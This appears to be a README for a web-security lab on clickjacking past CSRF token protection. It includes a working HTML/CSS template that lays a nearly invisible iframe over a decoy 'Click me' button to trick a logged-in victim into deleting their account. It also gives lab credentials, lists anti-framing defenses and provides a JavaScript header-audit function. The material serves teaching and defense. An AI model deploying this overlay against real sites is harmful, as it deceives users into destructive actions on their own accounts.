Clickjacking Exploit with CSRF Token Protection

This repository contains the project files and documentation for analyzing and exploiting basic clickjacking techniques with CSRF (Cross-Site Request Forgery) token protection. The project demonstrates how to exploit clickjacking vulnerabilities and explores methods to defend against them.


📜 Problem Statement

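The task is to craft an HTML exploit that manipulates a user's interaction on a decoy website, tricking them into deleting their account on a vulnerable site. The goal is to bypass CSRF token protection using a transparent iframe overlay positioned over the target button. The token does not help here because the framed page is the genuine one, loaded in the victim's own session, so the click submits a valid token.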


🛠 Project Objectives

  1. Understand clickjacking techniques:
    • Learn how iframe overlays can be maliciously used.
  2. Analyze CSRF token protection mechanisms:
    • Study vulnerabilities in token-based protections.
  3. Craft an HTML exploit:
    • Develop an iframe-based attack to bypass user awareness.
  4. Demonstrate exploit delivery:
    • Test the crafted exploit in a controlled environment to achieve account deletion.

🚀 Steps to Reproduce

1. Log in to the Vulnerable Application

  • Use the provided credentials:
    • Username: wiener
    • Password: Peter
  • Access the "Delete account" section of the target website.

2. Create the Exploit

  • Use the following HTML template to craft the exploit:
    <style>
        iframe {
            position: relative;
            width: 1000px;
            height: 700px;
            opacity: 0.000001;
            z-index: 2;
        }
        div {
            position: absolute;
            top: 515px;
            left: 60px;
            z-index: 1;
        }
    </style>
    <div>Click me</div>
    <iframe src="YOUR-LAB-ID"></iframe>

📖 Key Learnings

  1. Technical Insights:

    • Understanding iframe manipulation for clickjacking attacks.
    • The role of CSRF tokens in securing user actions.
    • Practical application of HTML and CSS in crafting exploits.
  2. Defense Mechanisms:

    • Use of X-Frame-Options headers to prevent embedding in iframes.
    • Implementing Content Security Policies (CSP) to restrict iframe behavior.
    • Robust validation of CSRF tokens to enhance security.
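To check the header-based defenses listed above, the following added example (not part of this repository) audits a response's headers for anti-framing protection. The function name `framingVerdict`, the lower-cased header keys, and the sample headers are assumptions made for illustration.

```javascript
// Added example: decide whether a response can be framed by another origin.
// Header names are assumed lower-cased, as Node's http module delivers them.
function framingVerdict(headers) {
  const csp = headers['content-security-policy'] || '';
  const directive = csp.split(';')
    .map(d => d.trim().split(/\s+/))
    .find(parts => parts[0].toLowerCase() === 'frame-ancestors');

  if (directive) {
    // An enforced frame-ancestors directive takes precedence over
    // X-Frame-Options per the CSP specification.
    const sources = directive.slice(1).map(s => s.toLowerCase());
    const open = sources.some(s => s === '*' || /^https?:(\/\/\*)?$/.test(s));
    if (open) return { protected: false, reason: 'frame-ancestors allows any origin' };
    const strict = sources.every(s => s === "'none'" || s === "'self'");
    return {
      protected: true,
      reason: strict ? 'frame-ancestors none/self' : 'frame-ancestors allowlist, review entries',
    };
  }

  const xfo = (headers['x-frame-options'] || '').trim().toUpperCase();
  if (xfo === 'DENY' || xfo === 'SAMEORIGIN') {
    return { protected: true, reason: 'X-Frame-Options ' + xfo };
  }
  if (xfo.startsWith('ALLOW-FROM')) {
    // Obsolete value that current browsers ignore, so the page stays framable.
    return { protected: false, reason: 'X-Frame-Options ALLOW-FROM is obsolete' };
  }
  if (/frame-ancestors/i.test(headers['content-security-policy-report-only'] || '')) {
    return { protected: false, reason: 'report-only CSP does not block framing' };
  }
  return { protected: false, reason: 'no anti-framing header' };
}

// Constructed sample responses (not captured from any real site).
const SAMPLES = {
  bare: {},
  xfoDeny: { 'x-frame-options': 'DENY' },
  cspNone: { 'content-security-policy': "default-src 'self'; frame-ancestors 'none'" },
  cspStarWithXfo: { 'content-security-policy': 'frame-ancestors *', 'x-frame-options': 'DENY' },
  reportOnly: { 'content-security-policy-report-only': "frame-ancestors 'none'" },
};
for (const [name, h] of Object.entries(SAMPLES)) {
  console.log(name, JSON.stringify(framingVerdict(h)));
}
```

The `cspStarWithXfo` case shows a permissive `frame-ancestors` undoing an otherwise correct `X-Frame-Options: DENY`, and `reportOnly` shows a policy that reports framing but never blocks it.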

🔐 Disclaimer

This repository is strictly for educational purposes. It is intended to provide insights into web security vulnerabilities and methods to mitigate such risks. Any misuse of the content for unauthorized purposes is strictly prohibited.